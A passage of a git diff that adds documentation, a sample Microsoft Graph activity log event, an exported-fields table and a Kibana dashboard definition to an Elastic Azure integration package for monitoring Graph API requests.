+ "kind": "event",
+ "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"durationMs\":1100725,\"location\":\"France Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe58790-a848-4a93-9d2c-5645972aejk9\",\"durationMs\":1100725,\"identityProvider\":\"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"France Central\",\"operationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/directoryRoles\",\"responseSizeBytes\":4300,\"responseStatusCode\":200,\"roles\":\"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"timeGenerated\":\"2024-03-07T10:24:44.7939418Z\",\"tokenIssuedAt\":\"2024-03-07T10:19:44Z\",\"userAgent\":\"\",\"userId\":null,\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3121e69\"},\"resourceId\":\"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"time\":\"2024-03-07T10:24:44.7939418Z\"}",
+ "type": [
+ "access"
+ ]
+ },
+ "http": {
+ "request": {
+ "id": "f7839da0-e7d1-4e4f-985a-64937fbge347",
+ "method": "GET"
+ },
+ "response": {
+ "bytes": 4300,
+ "status_code": 200
+ }
+ },
+ "log": {
+ "level": "4"
+ },
+ "related": {
+ "ip": [
+ "81.2.69.143"
+ ]
+ },
+ "source": {
+ "geo": {
+ "city_name": "London",
+ "continent_name": "Europe",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "location": {
+ "lat": 51.5142,
+ "lon": -0.0931
+ },
+ "region_iso_code": "GB-ENG",
+ "region_name": "England"
+ },
+ "ip": "81.2.69.143"
+ },
+ "tags": [
+ "preserve_original_event"
+ ],
+ "url": {
+ "domain": "graph.microsoft.com",
+ "extension": "0/directoryRoles",
+ "original": "https://graph.microsoft.com/v1.0/directoryRoles",
+ "path": "/v1.0/directoryRoles",
+ "scheme": "https"
+ }
+}
+```
+
+**Exported fields**
+
+| Field | Description | Type |
+|---|---|---|
+| @timestamp | Event timestamp. | date |
+| azure.correlation_id | Correlation ID. | keyword |
+| azure.graphactivitylogs.category | Azure Event Category. For example, Graph Activity Logs has value `MicrosoftGraphActivityLogs`. | keyword |
+| azure.graphactivitylogs.operation_name | Operation name. | keyword |
+| azure.graphactivitylogs.operation_version | The Graph API version of the event. | keyword |
+| azure.graphactivitylogs.properties.api_version | The API version of the event. | keyword |
+| azure.graphactivitylogs.properties.app_id | The identifier for the application. | keyword |
+| azure.graphactivitylogs.properties.at_content | Reserved for future use. | keyword |
+| azure.graphactivitylogs.properties.billed_size | The record size in bytes. | double |
+| azure.graphactivitylogs.properties.client_auth_method | Indicates how the client was authenticated. For a public client, the value is 0. If client ID and client secret are used, the value is 1. If a client certificate was used for authentication, the value is 2. | integer |
+| azure.graphactivitylogs.properties.client_request_id | The client request identifier when sent. If no client request identifier is sent, the value will be equal to the operation identifier. | keyword |
+| azure.graphactivitylogs.properties.identity_provider | The identity provider that authenticated the subject of the token. | keyword |
+| azure.graphactivitylogs.properties.is_billable | Specifies whether ingesting the data is billable. When _IsBillable is false ingestion isn't billed to your Azure account. | boolean |
+| azure.graphactivitylogs.properties.operation_id | The identifier for the batch. For non-batched requests, this will be unique per request. For batched requests, this will be the same for all requests in the batch. | keyword |
+| azure.graphactivitylogs.properties.request_uri | The URI of the request. | keyword |
+| azure.graphactivitylogs.properties.roles | The roles in token claims. | keyword |
+| azure.graphactivitylogs.properties.scopes | The scopes in token claims. | keyword |
+| azure.graphactivitylogs.properties.service_principal_id | The identifier of the servicePrincipal making the request. | keyword |
+| azure.graphactivitylogs.properties.sign_in_activity_id | The identifier representing the sign-in activitys. | keyword |
+| azure.graphactivitylogs.properties.source_system | The type of agent the event was collected by. For example, OpsManager for Windows agent, either direct connect or Operations Manager, Linux for all Linux agents, or Azure for Azure Diagnostics. | keyword |
+| azure.graphactivitylogs.properties.time_generated | The date and time the request was received. | date |
+| azure.graphactivitylogs.properties.token_issued_at | The timestamp the token was issued at. | date |
+| azure.graphactivitylogs.properties.type | The name of the table. | keyword |
+| azure.graphactivitylogs.properties.user_agent | The user agent information related to request. | keyword |
+| azure.graphactivitylogs.properties.wids | Denotes the tenant-wide roles assigned to this user. | keyword |
+| azure.graphactivitylogs.result_signature | Result signature. | keyword |
+| azure.resource.authorization_rule | Authorization rule. | keyword |
+| azure.resource.group | Resource group. | keyword |
+| azure.resource.id | Resource ID. | keyword |
+| azure.resource.name | Name. | keyword |
+| azure.resource.namespace | Resource type/namespace. | keyword |
+| azure.resource.provider | Resource type/namespace. | keyword |
+| azure.subscription_id | Azure subscription ID. | keyword |
+| azure.tenant_id | tenant ID. | keyword |
+| client.geo.city_name | City name. | keyword |
+| client.geo.continent_name | Name of the continent. | keyword |
+| client.geo.country_iso_code | Country ISO code. | keyword |
+| client.geo.country_name | Country name. | keyword |
+| client.geo.location.lat | Longitude and latitude. | geo_point |
+| client.geo.location.lon | Longitude and latitude. | geo_point |
+| client.geo.region_iso_code | Region ISO code. | keyword |
+| client.geo.region_name | Region name. | keyword |
+| client.ip | IP address of the client (IPv4 or IPv6). | ip |
+| client.user.id | Unique identifier of the user. | keyword |
+| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword |
+| cloud.availability_zone | Availability zone in which this host, resource, or service is located. | keyword |
+| cloud.image.id | Image ID for the cloud instance. | keyword |
+| cloud.instance.id | Instance ID of the host machine. | keyword |
+| cloud.instance.name | Instance name of the host machine. | keyword |
+| cloud.machine.type | Machine type of the host machine. | keyword |
+| cloud.project.id | The cloud project identifier. Examples: Google Cloud Project id, Azure Project id. | keyword |
+| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword |
+| cloud.region | Region in which this host, resource, or service is located. | keyword |
+| cloud.service.name | The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. Examples: app engine, app service, cloud run, fargate, lambda. | keyword |
+| container.id | Unique container id. | keyword |
+| container.image.name | Name of the image the container was built on. | keyword |
+| container.labels | Image labels. | object |
+| container.name | Container name. | keyword |
+| data_stream.dataset | Data stream dataset name. | constant_keyword |
+| data_stream.namespace | Data stream namespace. | constant_keyword |
+| data_stream.type | Data stream type. | constant_keyword |
+| destination.geo.region_name | Region name. | keyword |
+| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
+| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
+| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
+| event.created | event.created contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, @timestamp should be used. | date |
+| event.dataset | Event dataset | constant_keyword |
+| event.duration | Duration of the event in nanoseconds. If event.start and event.end are known this value should be the difference between the end and start time. | long |
+| event.id | Unique ID to describe the event. | keyword |
+| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
+| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data coming in at a regular interval or not. | keyword |
+| event.module | Event module | constant_keyword |
+| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword |
+| host.architecture | Operating system architecture. | keyword |
+| host.containerized | If the host is a container. | boolean |
+| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword |
+| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword |
+| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword |
+| host.mac | Host MAC addresses. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword |
+| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword |
+| host.os.build | OS build information. | keyword |
+| host.os.codename | OS codename, if any. | keyword |
+| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword |
+| host.os.kernel | Operating system kernel version as a raw string. | keyword |
+| host.os.name | Operating system name, without the version. | keyword |
+| host.os.name.text | Multi-field of `host.os.name`. | match_only_text |
+| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword |
+| host.os.version | Operating system version as a raw string. | keyword |
+| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword |
+| http.request.id | A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. | keyword |
+| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword |
+| http.response.bytes | Total size in bytes of the response (body and headers). | long |
+| http.response.status_code | HTTP response status code. | long |
+| log.level | Original log level of the log event. If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). Some examples are `warn`, `err`, `i`, `informational`. | keyword |
+| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| source.geo.city_name | City name. | keyword |
+| source.geo.continent_name | Name of the continent. | keyword |
+| source.geo.country_iso_code | Country ISO code. | keyword |
+| source.geo.country_name | Country name. | keyword |
+| source.geo.location.lat | Longitude and latitude. | geo_point |
+| source.geo.location.lon | Longitude and latitude. | geo_point |
+| source.geo.region_iso_code | Region ISO code. | keyword |
+| source.geo.region_name | Region name. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| tags | List of keywords used to tag each event. | keyword |
+| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword |
+| url.extension | The field contains the file extension from the original request url, excluding the leading dot. The file extension is only set if it exists, as not every url has a file extension. The leading period must not be included. For example, the value must be "png", not ".png". Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword |
+| url.full | If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. | wildcard |
+| url.full.text | Multi-field of `url.full`. | match_only_text |
+| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard |
+| url.original.text | Multi-field of `url.original`. | match_only_text |
+| url.password | Password of the request. | keyword |
+| url.path | Path of the request, such as "/search". | wildcard |
+| url.port | Port of the request, such as 443. | long |
+| url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword |
+| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword |
+| url.username | Username of the request. | keyword |
+| user.id | Unique identifier of the user. | keyword |
+| user_agent.device.name | Name of the device. | keyword |
+| user_agent.name | Name of the user agent. | keyword |
+| user_agent.original | Unparsed user_agent string. | keyword |
+| user_agent.original.text | Multi-field of `user_agent.original`. | match_only_text |
+| user_agent.os.full | Operating system name, including the version or code name. | keyword |
+| user_agent.os.full.text | Multi-field of `user_agent.os.full`. | match_only_text |
+| user_agent.os.name | Operating system name, without the version. | keyword |
+| user_agent.os.name.text | Multi-field of `user_agent.os.name`. | match_only_text |
+| user_agent.os.version | Operating system version as a raw string. | keyword |
+| user_agent.version | Version of the user agent. | keyword |
+
diff --git a/packages/azure/img/graph_activity.png b/packages/azure/img/graph_activity.png
new file mode 100644
index 00000000000..887a43347a5
Binary files /dev/null and b/packages/azure/img/graph_activity.png differ
diff --git a/packages/azure/img/graph_activity_logs.png b/packages/azure/img/graph_activity_logs.png
new file mode 100644
index 00000000000..3e5b0c7eea4
Binary files /dev/null and b/packages/azure/img/graph_activity_logs.png differ
diff --git a/packages/azure/kibana/dashboard/azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c.json b/packages/azure/kibana/dashboard/azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c.json
new file mode 100644
index 00000000000..5e135497757
--- /dev/null
+++ b/packages/azure/kibana/dashboard/azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c.json
@@ -0,0 +1,1638 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d1ebc51c-cb49-49f6-840a-2da6d8a6be5b\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d1ebc51c-cb49-49f6-840a-2da6d8a6be5b\",\"fieldName\":\"azure.tenant_id\",\"title\":\"Azure Tenant ID\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"d8d6db3e-83cb-40af-8f04-34f83ee80c6e\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d8d6db3e-83cb-40af-8f04-34f83ee80c6e\",\"fieldName\":\"cloud.region\",\"title\":\"Azure Cloud Region\",\"grow\":true,\"width\":\"medium\",\"exclude\":false,\"enhancements\":{}}},\"411c7a87-3506-4e60-949e-4d3694f18141\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"411c7a87-3506-4e60-949e-4d3694f18141\",\"fieldName\":\"http.request.method\",\"title\":\"HTTP Request Method\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"ba723455-7325-4205-95f4-6e52fa4e6e46\":{\"type\":\"rangeSliderControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ba723455-7325-4205-95f4-6e52fa4e6e46\",\"fieldName\":\"http.response.status_code\",\"title\":\"HTTP Status Code\",\"grow\":true,\"width\":\"medium\",\"value\":[\"100\",\"599\"],\"enhancements\":{}}}}" + }, + "description": "Provide an overview and statistics of the audit trail of all HTTP requests that the Microsoft Graph service received and processed.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": 
"data_stream.dataset", + "negate": false, + "params": { + "query": "azure.graphactivitylogs" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "azure.graphactivitylogs" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n[Integrations Page](/app/integrations/detail/azure/overview?integration=graphactivitylogs) \n\n**Overview**\n\nThis dashboard provides an overall view of Microsoft Graph Activity Logs. It provides insights into total requests made by applications and API clients in your tenant, while also breaking down the activity by Cloud Region, Users, and HTTP Methods.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 12, + "i": "f3f94a78-c1cd-479d-bce4-80086ce16207", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "f3f94a78-c1cd-479d-bce4-80086ce16207", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total HTTP Requests", + "operationType": "count", + "params": { + 
"emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "0d7a9e98-05e4-48cc-b602-fbf6441fb5eb", + "w": 10, + "x": 12, + "y": 0 + }, + "panelIndex": "0d7a9e98-05e4-48cc-b602-fbf6441fb5eb", + "title": "Total HTTP Requests", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Responses 1xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": 
"627dbdde-7bd2-4113-9422-d50e58c2efdd", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "100", + "lt": "199" + }, + "type": "range", + "value": { + "gte": "100", + "lt": "199" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "100", + "lt": "199" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "2d47eead-9f8b-4540-8e61-45290eda210a", + "w": 8, + "x": 22, + "y": 0 + }, + "panelIndex": "2d47eead-9f8b-4540-8e61-45290eda210a", + "title": "HTTP Responses 1xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f873ce81-d2b9-4d27-951b-ea42fe7b6629", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 2xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { 
+ "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "f873ce81-d2b9-4d27-951b-ea42fe7b6629", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "200", + "lt": "299" + }, + "type": "range", + "value": { + "gte": "200", + "lt": "299" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "200", + "lt": "299" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#54B399", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "e0d5b2a4-14b1-4652-81f5-8989c48cb427", + "w": 18, + "x": 30, + "y": 0 + }, + "panelIndex": "e0d5b2a4-14b1-4652-81f5-8989c48cb427", + "title": "HTTP Response 2xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "64260958-62e3-45e9-accd-9a2f49bc86a2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 3xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + 
"layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "64260958-62e3-45e9-accd-9a2f49bc86a2", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "300", + "lt": "399" + }, + "type": "range", + "value": { + "gte": "300", + "lt": "399" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "300", + "lt": "399" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "faac9860-e512-4adf-a34a-0a89690fef99", + "w": 8, + "x": 22, + "y": 6 + }, + "panelIndex": "faac9860-e512-4adf-a34a-0a89690fef99", + "title": "HTTP Response 3xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7cde628c-4f1d-44e1-8a34-169e4bb5e0b7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 4xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, 
+ "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "7cde628c-4f1d-44e1-8a34-169e4bb5e0b7", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "400", + "lt": "499" + }, + "type": "range", + "value": { + "gte": "400", + "lt": "499" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "400", + "lt": "499" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#E7664C", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "f81b2567-5721-4dca-9ebf-243a69b06fe2", + "w": 10, + "x": 30, + "y": 6 + }, + "panelIndex": "f81b2567-5721-4dca-9ebf-243a69b06fe2", + "title": "HTTP Response 4xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3027aa07-12ed-48a1-a760-745ed4a9ea26", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 5xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, 
